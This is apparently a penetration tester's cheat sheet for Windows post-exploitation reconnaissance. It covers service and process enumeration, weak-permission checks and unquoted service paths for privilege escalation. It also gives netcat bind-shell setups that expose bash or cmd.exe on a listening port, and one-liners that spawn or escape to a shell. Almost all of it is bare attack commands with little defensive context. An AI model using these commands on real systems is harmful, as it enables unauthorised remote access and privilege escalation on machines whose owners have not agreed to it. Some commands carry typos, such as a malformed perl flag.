Windows recon

• Find running services
  sc query state= all
  sc query state= all | find "SERVICE_NAME"
• Started windows Service - net start
• List of running processes with user
  tasklist /v /fi "username ne djndfj" //(where djndfj is a user that does not exists.)
  tasklist /v /fi "username ne djndfj" | find /i "system" // process running with system privileges.
• Read files - type <filename>
• Create file echo "text" > path/filename
• version - ver
• environment variables - set
• File permissions- cacls <filename>
• Lateral recon - ARP cache
  ARP -A
• Scheduled tasks- schtasks /query /fo LIST /v
• process with service- tasklist /SVC
• determine which Services can be modified by any authenticated user - accesschk.exe -uwcqv "Authenticated Users" * /accepteula
• to list all unquoted service paths - wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Reference:

http://www.fuzzysecurity.com/tutorials/16.html
https://www.toshellandback.com/2015/11/24/ms-priv-esc/
VizSec

Command execution to Shell with Netcat

• Linux (Host) with netcat

• $ mkfifo foo

• $ nc -lk 2600 0<foo | /bin/bash 1>foo         /*2600 is port*/

On Attacking Maching: $ nc ip 2600




• Windows (Host) with netcat
• nc -nlvp 4444 -e cmd.exe

Shell Spawning

python -c 'import pty; pty.spawn("/bin/sh")'

echo os.system('/bin/bash')

/bin/sh -i

perl —e 'exec "/bin/sh";'

perl: exec "/bin/sh";

ruby: exec "/bin/sh"

lua: os.execute('/bin/sh') 

(From within IRB) exec "/bin/sh" 

(From within vi):!bash 

(From within vi) :set shell=/bin/bash:shell

(From within map) !sh